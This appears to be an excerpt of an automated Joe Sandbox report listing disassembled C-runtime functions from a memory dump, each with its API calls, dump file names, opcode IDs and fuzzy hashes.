                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$strncat_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2901470385-0
                                                                                                          • Opcode ID: 7ff2964da5babb66509b982cacd7075bc3ff2d657bf5b2310aedd7c01b9f068c
                                                                                                          • Instruction ID: d3248d8161d50e21532cf1eb4996530937e69eb63a83cc7929f8d2f77992f68e
                                                                                                          • Opcode Fuzzy Hash: 7ff2964da5babb66509b982cacd7075bc3ff2d657bf5b2310aedd7c01b9f068c
                                                                                                          • Instruction Fuzzy Hash: C981C33290834ADFDB91CF68C94479DBBB4AF02354F144297F8A09B1C1D375BA81DBA1
                                                                                                          Function 6FD8CBFC Relevance: 19.6, APIs: 13, Instructions: 145COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6FD8CC8D,?,?,?), ref: 6FD8CC20
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FD8CC8D,?,?,?), ref: 6FDAC847
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6FD8CC8D,?,?,?), ref: 6FDAC851
                                                                                                          • __crtLCMapStringW.MSVCR100(?,00000200,?,000000FF,00000000,00000000,?,?,?,?,?,?,6FD8CC8D,?,?,?), ref: 6FDAC86E
                                                                                                          • _errno.MSVCR100(?,?,6FD8CC8D,?,?,?), ref: 6FDAC87F
                                                                                                          • _errno.MSVCR100(?,?,6FD8CC8D,?,?,?), ref: 6FDAC88A
                                                                                                          • _errno.MSVCR100(?,?,6FD8CC8D,?,?,?), ref: 6FDAC8A0
                                                                                                          • malloc.MSVCR100(00000008,?,?,6FD8CC8D,?,?,?), ref: 6FDAC8D8
                                                                                                          • _errno.MSVCR100(?,?,6FD8CC8D,?,?,?), ref: 6FDAC8F4
                                                                                                          • __crtLCMapStringW.MSVCR100(?,00000200,?,000000FF,00000000,00000000,?,?,6FD8CC8D,?,?,?), ref: 6FDAC90F
                                                                                                          • wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6FD8CC8D,?,?,?), ref: 6FDAC920
                                                                                                          • _freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6FD8CC8D,?,?,?), ref: 6FDAC939
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$String__crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 727409626-0
                                                                                                          • Opcode ID: ef8ea50fbde9240e30a76893364811effc92bc8c25934701d47af7c72105c0a7
                                                                                                          • Instruction ID: 49659be76a4b49c06c2a1c7dd80a606f9e094461fd1cefdab9fc74781a1d6f69
                                                                                                          • Opcode Fuzzy Hash: ef8ea50fbde9240e30a76893364811effc92bc8c25934701d47af7c72105c0a7
                                                                                                          • Instruction Fuzzy Hash: 6341B271604304EFD7845F78CC8496E37A4EF46364B1046AAE4259B2D0EB71FD4187A9
                                                                                                          Function 6FD84D90 Relevance: 19.6, APIs: 13, Instructions: 140stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _malloc_crt.MSVCR100(00000355,00000000,6FD85249,00000001,00000000,00000000), ref: 6FD84DA4
                                                                                                            • Part of subcall function 6FD80B31: malloc.MSVCR100(00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD80B3D
                                                                                                            • Part of subcall function 6FD84D56: strcat_s.MSVCR100(6FD86E28,6FD86E07,6FD86E18,?,00000083,00000083,?,6FD86E1C,6FD86E07,6FD86E28,00000002,6FD86E28,6FD86E07,?,00000000,00000000), ref: 6FD84D75
                                                                                                          • strcat_s.MSVCR100(00000004,00000351,6FD84D54,?,?,?,?,?,00000000,6FD85249,00000001,00000000), ref: 6FD84DF1
                                                                                                          • strcmp.MSVCR100(00000000,00000010,?,?,?,?,?,?,?,?,00000000,6FD85249,00000001,00000000), ref: 6FD84E0E
                                                                                                          • free.MSVCR100(6FD85249,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6FD84E55
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6FD85249,00000001), ref: 6FDB0BD1
                                                                                                          • free.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6FD85249), ref: 6FDB0BD9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: freestrcat_s$_invoke_watson_malloc_crtmallocstrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 350293339-0
                                                                                                          • Opcode ID: f465d58afbda5d862acbbabd77d841bc5da1c0929b14819acfe9f10307f7defe
                                                                                                          • Instruction ID: 330fd54ac73d654e95a3f22048b1a3d96698c42a1a9cf3107a66534b98c558c3
                                                                                                          • Opcode Fuzzy Hash: f465d58afbda5d862acbbabd77d841bc5da1c0929b14819acfe9f10307f7defe
                                                                                                          • Instruction Fuzzy Hash: 98418B71904705EFDB919FA9CD80A1ABBFDBF0235CF10092DE462AB2A0E771F9448B10
                                                                                                          Function 6FDD036C Relevance: 19.6, APIs: 13, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(?,?,00000000), ref: 6FDD0399
                                                                                                          • _errno.MSVCR100(?,?,00000000), ref: 6FDD03A4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,00000000), ref: 6FDD03AF
                                                                                                          • _getdrive.MSVCR100(?,?,00000000), ref: 6FDD03B9
                                                                                                          • _errno.MSVCR100(?,?,00000000), ref: 6FDD03C8
                                                                                                          • GetFullPathNameW.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 6FDD0423
                                                                                                          • _errno.MSVCR100(?,?,00000000), ref: 6FDD0436
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$FullNamePath__doserrno_getdrive_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2522281643-0
                                                                                                          • Opcode ID: 85595ef4e26aedbfe97bb64aa53555fabaf6d3b997aa54690adedf5ab430d8ef
                                                                                                          • Instruction ID: cbde73a46c5fe2d6050eacd8d04595c4028f945c32f48d433dca7ab5699529a6
                                                                                                          • Opcode Fuzzy Hash: 85595ef4e26aedbfe97bb64aa53555fabaf6d3b997aa54690adedf5ab430d8ef
                                                                                                          • Instruction Fuzzy Hash: 8731A276940309EBDB909FF4C948B9E77B8AF81394F11656AE414EB184EBB0F9018771
                                                                                                          Function 6FD8A35E Relevance: 19.6, APIs: 12, Strings: 1, Instructions: 116COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • free.MSVCR100(?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294,-0000006C), ref: 6FD8A3C4
                                                                                                          • free.MSVCR100(?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294,-0000006C), ref: 6FD96EFC
                                                                                                          • free.MSVCR100(?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294,-0000006C), ref: 6FD96F1D
                                                                                                          • free.MSVCR100(?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294,-0000006C), ref: 6FD96F35
                                                                                                          • free.MSVCR100(?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294,-0000006C), ref: 6FD96F40
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free
                                                                                                          • String ID: PHo
                                                                                                          • API String ID: 1294909896-431488675
                                                                                                          • Opcode ID: 263971bf49fb52199c369ce1cc89fec09238d7bc03d8addea5e0fb608a4a6284
                                                                                                          • Instruction ID: 21f7fd813c60457d9a06e0affdf8e519cbdd9a17f2fcf7f5cc3a97e39065b7b0
                                                                                                          • Opcode Fuzzy Hash: 263971bf49fb52199c369ce1cc89fec09238d7bc03d8addea5e0fb608a4a6284
                                                                                                          • Instruction Fuzzy Hash: B4314172109705EFDBA06FE4DD84E4A77E7EF02354F21092EE169DB194DB30B8C08A61
                                                                                                          Function 6FDFAC60 Relevance: 19.6, APIs: 13, Instructions: 102COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$_waccess_swcsnlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2205256078-0
                                                                                                          • Opcode ID: e166500d035af0b58cc35a43450a8f749293dafe8773e00dca5cd363c845571e
                                                                                                          • Instruction ID: 698738c76db36935ffb5483ced61cafcea3cb03e3c5c672b2a3a227922ff863b
                                                                                                          • Opcode Fuzzy Hash: e166500d035af0b58cc35a43450a8f749293dafe8773e00dca5cd363c845571e
                                                                                                          • Instruction Fuzzy Hash: 1D31F539516304DFDBE46F69D880A9D73B0EF41765F22801AE5654F2A0FB74B8C287B2
                                                                                                          Function 6FD9269E Relevance: 19.6, APIs: 13, Instructions: 93COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFullPathNameA.KERNEL32(?,?,00000000,?), ref: 6FD926E2
                                                                                                          • GetFullPathNameA.KERNEL32(?,00000000,00000000,00000000), ref: 6FDA7A58
                                                                                                          • GetLastError.KERNEL32 ref: 6FDA7A5E
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDA7A65
                                                                                                          • _errno.MSVCR100 ref: 6FDA7A7F
                                                                                                          • calloc.MSVCR100(?,00000001), ref: 6FDA7A94
                                                                                                          • _errno.MSVCR100 ref: 6FDA7AA5
                                                                                                          • _errno.MSVCR100 ref: 6FDA7AB2
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDA7ABD
                                                                                                          • free.MSVCR100(00000000), ref: 6FDA7ACB
                                                                                                          • _errno.MSVCR100 ref: 6FDA7AD1
                                                                                                          • free.MSVCR100(00000000), ref: 6FDA7AE8
                                                                                                          • _getcwd.MSVCR100(?,?), ref: 6FDA7AF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$FullNamePathfree$ErrorLast_dosmaperr_getcwd_invalid_parameter_noinfocalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1400498114-0
                                                                                                          • Opcode ID: ed210534df0a3fd1eef222384c070768b1cb11ae2f23062b5ce9990c63d93ec8
                                                                                                          • Instruction ID: d1559ff54b3d1189f9759d935c2ff9c93db392f3a30ff57186c47390f175edf8
                                                                                                          • Opcode Fuzzy Hash: ed210534df0a3fd1eef222384c070768b1cb11ae2f23062b5ce9990c63d93ec8
                                                                                                          • Instruction Fuzzy Hash: 63219772545309FEDB815FB4CC80A9E3BA9EF413A8F114526F5288B0C4FB72B9818674
                                                                                                          Function 6FDCC80A Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 193COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: :
                                                                                                          • API String ID: 0-336475711
                                                                                                          • Opcode ID: a17e36cb6b255b0c2b3575d277338b8cc168cbcf9700e65b4b8a51074db646cc
                                                                                                          • Instruction ID: 93564b3322ca044dfa760c64ade2014829e1632eed741a11a1807c148eaa15ee
                                                                                                          • Opcode Fuzzy Hash: a17e36cb6b255b0c2b3575d277338b8cc168cbcf9700e65b4b8a51074db646cc
                                                                                                          • Instruction Fuzzy Hash: E6512D36904386EADB914B6998407DF77BDEF46325B20011AE664BB1C0EF30F9428793
                                                                                                          Function 6FD8C6BA Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 141COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EncodePointer.KERNEL32(?,00000000,00000000), ref: 6FD8C753
                                                                                                          • _malloc_crt.MSVCR100(?), ref: 6FD8C76F
                                                                                                          • ?terminate@@YAXXZ.MSVCR100(00000000,00000000), ref: 6FD8C7A0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ?terminate@@EncodePointer_malloc_crt
                                                                                                          • String ID: bad allocation$csm
                                                                                                          • API String ID: 1737418049-2003371537
                                                                                                          • Opcode ID: 30ee99f0eb70ffadb5b3868c8e760f8ea8ae74d3af6a9ea13cbcbdd25bf1d9c1
                                                                                                          • Instruction ID: a60397657e1faa874245f5013811925e059ea1e57346dc4152029eefbbc3d908
                                                                                                          • Opcode Fuzzy Hash: 30ee99f0eb70ffadb5b3868c8e760f8ea8ae74d3af6a9ea13cbcbdd25bf1d9c1
                                                                                                          • Instruction Fuzzy Hash: CF419E35104300EFCBA4CFB9D890A9ABBF9AF443107508A6EE46ACB654D730F545CB91
                                                                                                          Function 6FD98639 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 109COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$MatchType
                                                                                                          • String ID: MOC$RCC$csm$csm
                                                                                                          • API String ID: 965401092-1441736206
                                                                                                          • Opcode ID: a8c60d8e1276021d7158493a35427765fadefa4f5b660dad636263f93ba6c187
                                                                                                          • Instruction ID: eb0961b712f12ec328403ffc8eba633cd76261d238561fa49d6245b9fd6dd65a
                                                                                                          • Opcode Fuzzy Hash: a8c60d8e1276021d7158493a35427765fadefa4f5b660dad636263f93ba6c187
                                                                                                          • Instruction Fuzzy Hash: C431C235504704CFCBA0CFA8C440BA973B8AF01354F94466BD8A98B251D736F544CF96
                                                                                                          Function 6FDFBFC5 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 95COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _calloc_crt.MSVCR100(00000008,00000001), ref: 6FDFBFDE
                                                                                                          • _errno.MSVCR100 ref: 6FDFBFEB
                                                                                                          • _calloc_crt.MSVCR100(000000D8,00000001), ref: 6FDFC002
                                                                                                          • free.MSVCR100(00000000), ref: 6FDFC010
                                                                                                          • _calloc_crt.MSVCR100(00000220,00000001), ref: 6FDFC01E
                                                                                                          • free.MSVCR100(00000000), ref: 6FDFC02E
                                                                                                          • free.MSVCR100(00000000,00000000), ref: 6FDFC034
                                                                                                          • free.MSVCR100(00000000,00000000,00000000), ref: 6FDFC069
                                                                                                          • free.MSVCR100(?), ref: 6FDFC089
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,?), ref: 6FDFC09D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$_calloc_crt$_errno
                                                                                                          • String ID: Jo
                                                                                                          • API String ID: 2061585734-2441139153
                                                                                                          • Opcode ID: 51ed242ac5b3af2c2fa6d5bfb5414f20117f156e6831a3a2abb6d3d6ef2da11b
                                                                                                          • Instruction ID: 389c75236d8f2ef1d9828182a650a697c551c5245e602a880b0478cd83948347
                                                                                                          • Opcode Fuzzy Hash: 51ed242ac5b3af2c2fa6d5bfb5414f20117f156e6831a3a2abb6d3d6ef2da11b
                                                                                                          • Instruction Fuzzy Hash: 90214C36106701EBE3A21F29DC04D0B7FE5DF42374B214119E4A48B1E0EF32B8529A74
                                                                                                          Function 6FDCAA54 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 80librarythreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 6FDCAA6B
                                                                                                          • GetModuleFileNameW.KERNEL32(6FD70000,?,00000104), ref: 6FDCAA87
                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 6FDCAA98
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCAAAF
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDCAACA
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDCAADB
                                                                                                          • CreateThread.KERNEL32(00000000,-00000018,6FDC0EC3,00010000,6FDC0EB1,?), ref: 6FDCAB1D
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCAB27
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDCAB3F
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDCAB4D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@Concurrency@@ErrorExceptionLastModuleThrow$CreateFileHandleLibraryLoadNameThread
                                                                                                          • String ID: \so
                                                                                                          • API String ID: 3046512301-3095705423
                                                                                                          • Opcode ID: 0d961f0e0f8f990d8ccacd1fa177c6df9945001e6591c4807df8ad67024aefcf
                                                                                                          • Instruction ID: 22ddb8e045a684ada68c92d1bc3f69b7aabc1cb556db8e5960a9f96380b55775
                                                                                                          • Opcode Fuzzy Hash: 0d961f0e0f8f990d8ccacd1fa177c6df9945001e6591c4807df8ad67024aefcf
                                                                                                          • Instruction Fuzzy Hash: 7321F171600309ABEF889FA0CC59BAE3BB8BF04310F240169F516DB180EB34FA119B61
                                                                                                          Function 6FDD01DB Relevance: 18.1, APIs: 12, Instructions: 98COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD020C
                                                                                                          • _errno.MSVCR100 ref: 6FDD0214
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD021F
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 6FDD022F
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 6FDD0249
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000002), ref: 6FDD025F
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000001,00000000), ref: 6FDD027C
                                                                                                          • towupper.MSVCR100(0000003D), ref: 6FDD02A6
                                                                                                          • SetEnvironmentVariableW.KERNEL32(?,?), ref: 6FDD02C2
                                                                                                          • free.MSVCR100(?), ref: 6FDD02EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$EnvironmentVariable__doserrno_calloc_crt_errno_invalid_parameter_invalid_parameter_noinfofreetowupper
                                                                                                          • String ID:
                                                                                                          • API String ID: 2646161260-0
                                                                                                          • Opcode ID: a5eb038a2e6790800acef624143eb1d6f92221bb223f4da6b75db3b6840d31de
                                                                                                          • Instruction ID: eeb7a091cb41d78ed766e83f84e8b7c4e9152e0489e524c8f474b394e5c1aa16
                                                                                                          • Opcode Fuzzy Hash: a5eb038a2e6790800acef624143eb1d6f92221bb223f4da6b75db3b6840d31de
                                                                                                          • Instruction Fuzzy Hash: 9C31D635942318DADB509BB4DC4CBDE7FB8AF853A4F10514AF425D71C4DB70BA818BA4
                                                                                                          Function 6FDD4D8C Relevance: 18.1, APIs: 12, Instructions: 96COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4DAB
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4DB6
